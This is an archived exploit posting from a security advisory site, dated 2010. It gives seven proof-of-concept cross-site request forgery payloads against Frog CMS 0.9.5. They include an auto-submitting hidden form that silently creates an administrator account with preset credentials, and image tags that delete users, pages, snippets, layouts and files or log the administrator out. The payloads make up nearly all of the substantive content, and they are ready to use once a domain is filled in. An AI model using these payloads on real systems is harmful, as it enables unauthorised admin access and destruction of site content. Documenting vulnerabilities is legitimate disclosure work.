Frog CMS 0.9.5 Cross Site Request Forgery

Frog CMS 0.9.5 Cross Site Request Forgery: Posted Jul 13, 2010; Authored by 10n1z3d; Frog CMS version 0.9.5 suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; SHA-256 | f4b687fbfbdf8c2ba62880947f18660259eecf97c18b5a2f3456864a6590a92c; Download | Favorite | View

Frog CMS 0.9.5 Cross Site Request Forgery

<!---
    Title: Frog CMS 0.9.5 Multiple CSRF Vulnerabilities
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Sun 11 Jul 2010 10:22:48 AM EEST
    Vendor: http://www.madebyfrog.com/
    Download: http://www.madebyfrog.com/public/download/files/frog_095.tar.gz
--->
     
-=[ CSRF PoC 1 - Create Admin User ]=-
 
    <html>
        <head>
            <title>Frog CMS 0.9.5 Multiple CSRF Vulnerabilities - Create Admin User</title>
        </head>
        <body onload="document.csrf.submit();">
                <!--- Edit these --->
            <form name="csrf" action="http://[domain]/admin/?/user/add" method="post">
                <input type="hidden" name="user[name]" value="root" />
                <input type="hidden" name="user[email]" value="root@root.com" />
                <input type="hidden" name="user[username]" value="root"/>
                <input type="hidden" name="user[password]" value="rootroot"/>
                <input type="hidden" name="user[confirm]" value="rootroot" />
                <!--- Do not edit below --->
                <input type="hidden" name="user_permission[administrator]" value="1" />
                <input type="hidden" name="user_permission[developer]" value="2" />
                <input type="hidden" name="user_permission[editor]" value="3" />
            </form>
        </body>
    </html>
     
-=[ CSRF PoC 2 - Delete User ]=-
     
    <img src="http://[domain]/admin/?/user/delete/2"  alt="Do you see this?" />
     
-=[ CSRF PoC 3 - Delete Page ]=-
     
    <img src="http://[domain]/admin/?/page/delete/3"  alt="Do you see this?" />
 
-=[ CSRF PoC 4 - Delete Snippet ]=-
     
    <img src="http://[domain]/admin/?/snippet/delete/1"  alt="Do you see this?" />
     
-=[ CSRF PoC 5 - Delete Layout ]=-
     
    <img src="http://[domain]/admin/?/layout/delete/1"  alt="Do you see this?" />
     
-=[ CSRF PoC 6 - Delete File (works only if the File Manager plugin is installed) ]=-
     
    <img src="http://[domain]/admin/?/plugin/file_manager/delete/index.html"  alt="Do you see this?" />
 
-=[ CSRF PoC 7 - Logout The Administrator ]=-
     
    <img src="http://[domain]/admin/?/login/logout"  alt="Do you see this?" />
     
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Frog CMS 0.9.5 Cross Site Request Forgery

Frog CMS 0.9.5 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Frog CMS 0.9.5 Cross Site Request Forgery

Share This

Frog CMS 0.9.5 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems